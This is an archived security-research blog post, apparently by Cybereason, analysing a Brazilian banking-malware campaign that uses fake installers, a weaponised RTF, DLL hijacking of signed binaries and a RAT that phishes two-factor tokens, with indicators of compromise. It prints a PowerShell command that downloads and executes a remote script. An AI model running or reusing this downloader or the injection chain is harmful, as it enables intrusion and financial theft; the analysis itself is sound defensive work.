{
	"id": "2cf97692-2cd7-4830-87a7-55ece2165663",
	"created_at": "2026-04-06T00:12:22.179419Z",
	"updated_at": "2026-04-10T13:12:34.504204Z",
	"deleted_at": null,
	"sha1_hash": "852f2a018f576ed0fef6c0301e93e15ae0045367",
	"title": "VAI MALANDRA: A LOOK INTO THE LIFECYCLE OF BRAZILIAN FINANCIAL MALWARE: Part one",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4362808,
	"plain_text": "VAI MALANDRA: A LOOK INTO THE LIFECYCLE OF BRAZILIAN\r\nFINANCIAL MALWARE: Part one\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 20:27:26 UTC\r\nResearch by: Assaf Dahan\r\nFor more than a decade, Brazil has been one of the most active arenas of financial scamming, a fertile ground for banking\r\nTrojans and social engineering attacks. Brazilian threat actors have proven creative and up-to-date with global offensive\r\nmethods and trends and utilize them in a variety of ways to target the Brazilian market and Portuguese speakers. We have\r\nobserved an evolution in the tools, techniques and procedures (TTPs) used by the attackers, who constantly alter and\r\nimprove their delivery techniques to evade traditional security products and remain undetected. One of the more interesting\r\ntechniques used by the group in recent years is the extensive abuse of trusted and signed binaries by reputable companies\r\nsuch as HP, NVIDIA, RealTek and VMware to cloak malicious code that's either loaded via DLL-hijacking or injected into\r\ntrusted applications.\r\nCybereason has been observing the Brazilian threat landscape and tracking several recent campaigns. Using AI-based\r\nbehavioral detection, we uncovered and analyzed the lifecycle of interesting and stealthy attacks, which we'll discuss in this\r\nblog.\r\nCheck out Team Nocturnus' other research on Brazilian financial malware\r\nOverlay RAT Campaign\r\nWe recently observed an interesting multi-staged campaign using a myriad of techniques to keep the activity under the radar.\r\nThis campaign uses social engineering to infect the victim’s machine with a variant of a financial malware that's often\r\nreferred to as Remoto RAT. This malware gives attackers full control over the victim’s machine and can circumvent the two-factor authentication methods used by many Brazilian financial institutions.\r\nInfection Vector 1: Fake Java Installer\r\nCybereason telemetry caught a suspicious download of a fake Java installer that originated in user’s browsing via the\r\nChrome browser:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 1 of 20\n\nThe IP address is resolved to the following domain:\r\nThe website is clearly a phishing site that mimics a legitimate Java download website and is localized to target Brazilian\r\nusers:\r\nThe unsuspecting users are persuaded to download the Java update, which contains the following Zip file:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 2 of 20\n\n7zip Command-line when unzipped by the user:\r\n\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"C:\\Users\\]REDACTED]\\Downloads\\Java-install6375727.zip\"\r\nThe Zip file contains a suspiciously tiny executable (10KB):\r\nJava.exe (SHA-1: 75A29FEC62A95B4C820454CD82DDF70742A67602)\r\nStatic analysis of the executable reveals more suspicious features, such as the file description:\r\nAs well as the PDB path that points to “HowToRunPowerShell”:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 3 of 20\n\nThis PDB path obviously references a publicly available code project, whose topic is “How to run PowerShell scripts from\r\nC#”:\r\nIronically, the java.exe file written in .NET, as shown by compiler signatures:\r\nThe .NET binary is obfuscated. However, after deobfuscating it, a plain-text C# code can be observed. The tiny executable\r\nhas a sole purpose: to download a secondary payload:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 4 of 20\n\nThe execution of the fake Java installer via the Cybereason user interface shows the spawned cmd.exe and PowerShell\r\ndownloader:\r\nThe downloader attempts to download an image file:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 5 of 20\n\n\"C:\\Windows\\System32\\cmd.exe\" /C powershell -nop -c \"iEx(New-Object\r\nNet.WebClient).DownloadString('hxxps://cl[.]ly/f6f5fac35d25/download/testepepeu.jpg')\"\r\nThe image file is in fact an obfuscated PowerShell script.\r\nTestepepeu.jpg - 934BF6E81040089253C209A6B4286A235C240473\r\nThe PowerShell script is almost identical in terms of structure, strings and naming conventions to previously documented\r\nscripts associated with Brazilian and Chilean campaigns.  \r\nPrior to downloading the secondary payload, the PowerShell script will also conduct a few sanity check such as checking\r\nwhether it runs on a virtual machine (VMWARE, VirtualBox, etc.).\r\nAs seen, the code has many Portuguese language references, further affirming that the threat actors speak Portuguese.\r\nThe purpose of the PowerShell script is to download, extract and execute the contents of another Zip file called “open.zip”\r\nas well as a SSL certificate, behavior typically observed in financial malware:  \r\nOpen.zip - 7C5F9C7541FE56FA11703156086D9F9D9C735800\r\nEven though the Zip file is not password protected, the antivirus detection rate is very low:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 6 of 20\n\nThe Zip file contains these three files:\r\nPayload Analysis: Abusing A Trusted Binary\r\nFile name SHA-1 hash Purpose\r\nNvstlink.exe 7FF99C01BADAD20BF153483E31BDEAD611D6D203\r\nLegitimate and signed NVIDIA\r\nexecutable.\r\nOPENGL32.DLL 8E12FF6CFC217D5C9A6D1A7487634E50ABEB672E\r\nFake DLL side-loaded by the signed\r\nNVIDIA executable. Decrypts and\r\nloads to memory the main payload.\r\nSoungs.config 0EA42E64F4C8653D865EEA79EB3B37B81206CAC1\r\n(Unknown to VT)\r\nEncrypted malware payload.\r\nThe attackers are using a well known technique called DLL hijacking to abuse a vulnerable signed and trusted binary. This\r\ntechnique was previously observed in the context of Brazilian financial malware to exploit an AutoIT binary.\r\nIn this instance, the attackers chose an authentic, signed NVIDIA binary (nvstlink.exe), which is vulnerable to DLL\r\nhijacking:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 7 of 20\n\nNvstlink.exe’s import table shows that it will attempt to load OPENGL32.DLL upon execution.\r\nThe attackers specifically replaced the original OPENGL32.DLL, required by the executable, with a fake OPENGL32.DLL,\r\nwhich will attempt to locate the file “soungs.config” within the same folder, decrypt its contents and load it into memory:\r\nThe decrypted payload is mapped into three memory regions within the memory space of nvstlink.exe. The first one\r\n(0x3530000 - RW) is the PE header and the second one (0x3531000 - RWX) is the executable part of the payload. The third\r\npart is a copy of the whole executable (RW):\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 8 of 20\n\nInfection Vector 2: RTF Document Weaponized with CVE 2017-11882\r\nWe observed another infection vector that also relies on social engineering to trick a user into opening a Word document\r\nthat's actually a RTF document. \r\nhttps://www.virustotal.com/#/file/e7b96141c68d215a249abfe8f70ceb3ef934d1857ebae70953dc30a0b542ad06/detection\r\nExamining the RTF document using Didier Steven’s rtfdump.py, we can see three entries with embedded objects using the\r\nfollowing command: rtfdump.py -f O [file]:\r\nWe can see a reference to two entries called “Equation.3”, further suggesting the usage of the infamous Equation Editor\r\nexploit (CVE 2017-11882):  \r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 9 of 20\n\nDumping and decoding the embedded section, we can see the following payload split between the entries.\r\nPowerShell payload found in section 7:\r\nDropped payload in %tmp% folder, invoking a PowerShell downloader:\r\nExecution of the dropped “love.bat” script found in section 10:\r\nThe downloaded .png file is actually a PowerShell file with a very low detection rate:\r\nhxxps://cl[.]ly/0b2E2g2c3y2L/download/newpepe.png\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 10 of 20\n\nhttps://www.virustotal.com/#/file/ba203c49d639b4de69c31cea2c378d255a0318e133d9e859c8786dae2ce5445e/detection\r\nThe PowerShell script is almost identical to the PowerShell script seen in the first example, with a few changes in file names\r\nand URLs:\r\nThe PowerShell will download, extract and execute the contents of a Zip file called “new10.zip”:\r\nhttps://www.virustotal.com/#/file/5f07d1b49b6b32d8b966f4c3c6694d10822746f80c1a4a494440bf913e934cd9/detection\r\nFile name SHA-1 hash Purpose\r\nhpdriver.exe 4F66783ACE879E221C0DB62A92C21FFE587F7B3B\r\nDecrypts, loads and injects the content of\r\n“security.config” to nvstlink.exe.\r\nnvstlink.exe 11942D70B3180C860778F160F15EB4ABC4B159D9\r\nAuthentic and signed binary by HP. Used\r\nas a non-suspicious host for the injected\r\nmalware code. Original file name\r\n“LHBeacon.exe”.\r\nsecurity.config 2335F8CFAC306406929459B8A21047F007A7908F Encrypted Overlay RAT payload.\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 11 of 20\n\nHpdriver.exe - AutoIt Loader Analysis\r\nStatic examination of the binary’s strings indicates that there’s an embedded AutoIt script:\r\nSearching through the resource section, an RCDATA section is identified containing the script in its compiled format:\r\nUsing the tool Exe2Aut, it is possible to decompile it back to the script, which spans more than 6,765 lines of code.\r\nAnalysis of the script shows that many parts of the code were copied “as is” from publicly available coding projects, for\r\nexample:\r\n“Subrogation.au3”\r\nDataloader \r\nThe script serves as a loader and does the following:\r\n1. Locate and decrypt the contents of “security.config” (RAT payload)\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 12 of 20\n\n2. Load and map the decrypted loader binary to memory, executing the exported function “x”:\r\n3. This function locates nvstlink.exe using a wildcard search: \r\n4. Once found, nvstlink.exe will be launched using CreateProcessA in a suspended mode:\r\n5. Then it will locate the resource “MYHOOK” and load it into memory:\r\nExamining the “MYHOOK” resource in RT_RCDDATA (SHA-1\r\n5C1AD7C4CD06316172E4AA579C9EB9159C72DBAA), shows that it is in fact an embeddedDLL, which contains the\r\nRAT payload. Based on the language setting, it was likely compiled in Brazil: \r\n6. Inject the decrypted RAT DLL to the suspended nvstlink.exe, following a classic code injection API chain: \r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 13 of 20\n\n7. Resume nvstlink.exe and exit itself\r\nThe injection was also caught by the Cybereason platform.\r\nCybereason flags suspicious and malicious behavioral patterns, such as code injections and memory manipulations:\r\nIt’s interesting to notice the difference between infection vector one and two. In both cases the attackers are exploiting the\r\ntrust given to signed binaries, and use those applications to conceal the RAT’s malicious code. However, there is a difference\r\nin the implementation. In infection vector one, we see classic DLL hijacking. In infection vector two, we see code injection.\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 14 of 20\n\nWhat stands out even more is that the attackers refrained from injecting code into Windows host processes (such as\r\nexplorer.exe or svchost.exe) and chose to download a signed and trusted third-party application, only to inject malicious\r\ncode into it, probably hoping that it would look less suspicious.\r\nOverlay RAT Analysis\r\nAfter dumping the relevant memory region and fixing it, we get an unpacked and decrypted payload, which can now be\r\nanalyzed. The dumped payload is a written in Delphi, which is consistent with other reports about the RAT:\r\nThe compilation date refers to August 2018:\r\nExamining the dumped file sections, we can see that the largest section is the .rsrc section:\r\nGoing over the resources, inside the RT_RCDATA section, we can see over 20 images with Portuguese text:\r\nEach image contains a message from either a bank and financial institutions operating in Brazil and requests the user submit\r\neither a two-factor token or password for security reasons. The reason for storing those images lies in image-base phishing, a\r\nvery popular technique among Brazilian cybercriminals. The malware uses a transparent browser screen overlay, tricking the\r\nunsuspecting user into submitting either the token or credential, thus circumventing two-factor and other out-of-bound\r\nsecurity checks.\r\nExamples of images found in the unpacked binary:\r\nSantander Bank message:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 15 of 20\n\nBanco do Brasil message:\r\nItau Unibanco message:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 16 of 20\n\nOther notable targeted Brazilian financial institutions include:\r\nBanco Bradesco\r\nSicredi\r\nUnicred do Brasil\r\nSicoob\r\nBanco de Inter\r\nBanco de Nordeste\r\nBanco Mercantil do Brasil\r\nCaixa Economica Federal\r\nThe malware hooks the users’ browsers and monitors any access to financial institutions found in its configuration. The\r\nmalware strings are kept encrypted in memory, and decrypted once the target website has been accessed.\r\nThe unpacked binary also include the strings of the servers that the malware communicates with:\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 17 of 20\n\nIt is interesting to see that even the unpacked RAT binary had a relatively low detection rate on VirusTotal:\r\nhttps://www.virustotal.com/#/file/3b688c523a18408cc65866f6447e71d1148c198fcd6251c290ae53c90f766946/detection\r\nConclusion\r\nIn this blog, we reviewed a campaign that shows how Brazilian cybercriminals target the customers of financial institutions.\r\nWhile abusing legitimate binaries with code injection, DLL hijacking, RTF exploits and PowerShell downloaders, are not\r\nnew techniques, using them together along with elaborate social engineering creates a very effective multi-stage infection\r\nchain.\r\nIn our second blog (look for it in the coming weeks), we will look at other Brazilian campaigns that target financial\r\ninstitutions and use even stealthier techniques to evade detection. \r\nIndicators of Compromise\r\nFiles\r\ne0247073e68070413235a8aa92008de2970e1bf0\r\n9B6016D9523DE39BF2E5F854549CED9A3F35BE85\r\n4F66783ACE879E221C0DB62A92C21FFE587F7B3B\r\n5C1AD7C4CD06316172E4AA579C9EB9159C72DBAA\r\n08359247B1F9069AA07F015921035F362185D665\r\n87358CC245FDF172EC532C2B1C729E1A6F9CB18E\r\n9422FAFBC54983EFB10A75A18F039A149F3C1CB2\r\n8E12FF6CFC217D5C9A6D1A7487634E50ABEB672E\r\n75A29FEC62A95B4C820454CD82DDF70742A67602\r\n0EA42E64F4C8653D865EEA79EB3B37B81206CAC1\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 18 of 20\n\n934BF6E81040089253C209A6B4286A235C240473\r\n7C5F9C7541FE56FA11703156086D9F9D9C735800\r\nBBC8628F92209364C79EC38284DC772B81100BD7\r\n0EA42E64F4C8653D865EEA79EB3B37B81206CAC1\r\n2203714D747145F9363A6F0DE0D5E7F2FEA792AA\r\n222D89261CB18D5EB26AC84041BFA0E1B399A2D5\r\nB77DD8A56F480F052E262ABF9FB856E8B9F8757D\r\n363E4734F757BDEB89868EFE94907774A327695E (SSL Certificate - x.cer)\r\nDomains\r\nCl[.]ly\r\nFlashplayers2018[.]com\r\nJavadownloadbrasil[.]site\r\nMusicalad[.]com[.]br\r\nNfmicrosoft[.]com\r\nnetframework2018-microsoft[.]com\r\nURLs\r\nhxxp://185.135[.]9[.]102/suspiro/index.php\r\nhxxp://198.50[.]138[.]133/latex/index.php\r\nhxxp://198[.]50.138[.]131/hilton/index.php\r\nhxxp://corretorandremendes[.]com[.]br/images/contA/ponto.php\r\nhxxp://f[.]cl[.]ly/items/1k3W1B0G0a3P0O41220g/open.zip\r\nhxxp://flashplayers2018[.]com/WEBFLASH_IESS.DOC\r\nhxxp://x.ss2[.]us/x.cer - SSL certificate\r\nhxxps://cl.ly/390j3n40002a/download/new10[.]zip\r\nhxxps://cl[.]ly/0a5f7eb35382/download/flatrom.jpg\r\nhxxps://cl[.]ly/0b2E2g2c3y2L/download/newpepe.png\r\nhxxps://cl[.]ly/694965a97454/download/xalita.jpg\r\nhxxps://cl[.]ly/8a89ef6803d6/download/paulo.jpg\r\nhxxps://cl[.]ly/f6f5fac35d25/download/testepepeu.jpg'\r\nhxxps://s3[.]amazonaws[.]com/f.cl.ly/items/2y1A3w3I3K12242b0r36/new10.zip?\r\nAWSAccessKeyId=AKIAJEFUZRCWSLB2QA5Q\u0026Expires=1531388058\u0026Signature=VDxQ29GFO%2FqanJvH0SZP3yH87CE%3D\u0026r\r\ncontent-disposition=attachment\r\nhxxps://supgmx[.]egnyte[.]com/dd/PPlFR0ONrE/\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 19 of 20\n\nIPs\r\n185.135[.]9[.]102\r\n198.50[.]138[.]133\r\n198.50[.]138[.]131\r\nSource: https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nhttps://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking"
	],
	"report_names": [
		"brazilian-financial-malware-dll-hijacking"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434342,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.pdf",
		"text": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.txt",
		"img": "https://archive.orkl.eu/852f2a018f576ed0fef6c0301e93e15ae0045367.jpg"
	}
}